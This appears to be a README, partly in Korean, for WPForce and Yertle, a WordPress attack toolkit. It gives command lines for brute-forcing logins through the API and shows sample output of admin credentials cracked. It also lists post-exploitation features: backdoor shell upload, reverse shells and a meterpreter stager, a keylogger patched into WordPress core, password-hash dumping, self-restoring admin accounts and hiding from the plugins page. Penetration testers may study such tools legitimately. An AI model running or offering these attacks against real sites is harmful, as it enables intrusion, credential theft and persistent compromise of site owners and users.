WPForce
1.0.0
WForce는 Wordpress 공격 도구 모음입니다. 현재 여기에는 API를 통해 무차별 로그인을 수행하는 WPForce와 관리자 자격 증명이 발견되면 셸을 업로드하는 Yertle이라는 2개의 스크립트가 포함되어 있습니다. Yertle에는 또한 다수의 사후 활용 모듈이 포함되어 있습니다.
자세한 내용은 여기 블로그 게시물을 참조하세요: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
다른 언어로 된 블로그:
중국어 - www.mottoin.com/100381.html
포르투갈어 - http://www.100security.com.br/wpforce/
스페인어 - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html
https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/
러시아어 - https://hackware.ru/?p=2547
프랑스어 - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/
터키어 - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
,-~~-.___. __ __ ____ _____
/ | x / /| _ | ___|___ _ __ ___ ___
( ) 0 / / / | |_) || |_ / _ | '__|/ __|/ _ .
_/-, ,----' ____ V V / | __/ | _|| (_) || | | (__| __/
==== || _ _/_/ |_| |_| ___/ |_| ___|___|
/ -'~; || |
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] are valid credentials!
--------------------------
100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input file name
-w WORDLIST, --wordlist WORDLIST
Wordlist file name
-u URL, --url URL URL of target
-v, --verbose Verbose output. Show the attemps as they happen.
-t THREADS, --threads THREADS
Determines the number of threads to be used, default
is 10
-a AGENT, --agent AGENT
Determines the user-agent
-d, --debug This option is used for determining issues with the
script.
python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
_..---.--. __ __ _ _
.' __|/O.__) / /__ _ __| |_| | ___
/__.' _/ .-'_ V / _ '__| __| |/ _ .
(____.'.-_____) | | __/ | | |_| | __/
(_/ _)__(_ _)_ |_|___|_| __|_|___|
(_..)--(.._)'--' ~n00py~
Post-exploitation Module for Wordpress
Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>
-h, --help show this help message and exit
-i, --interactive Interactive command shell
-r, --reverse Reverse Shell
-t TARGET, --target TARGET
URL of target
-u USERNAME, --username USERNAME
Admin username
-p PASSWORD, --password PASSWORD
Admin password
-li IP, --ip IP Listener IP
-lp PORT, --port PORT
Listener Port
-v, --verbose Verbose output.
-e EXISTING, --existing EXISTING
Skips uploading a shell, and connects to existing
shell
Yertle에는 현재 다음 모듈이 포함되어 있습니다.
Core Commands
=============
Command Description
------- -----------
? Help menu
beef Injects a BeEF hook into website
dbcreds Prints the database credentials
exit Terminate the session
hashdump Dumps all WordPress password hashes
help Help menu
keylogger Patches WordPress core to log plaintext credentials
keylog Displays keylog file
meterpreter Executes a PHP meterpreter stager to connect to metasploit
persist Creates an admin account that will re-add itself
quit Terminate the session
shell Sends a TCP reverse shell to a netcat listener
stealth Hides Yertle from the plugins page
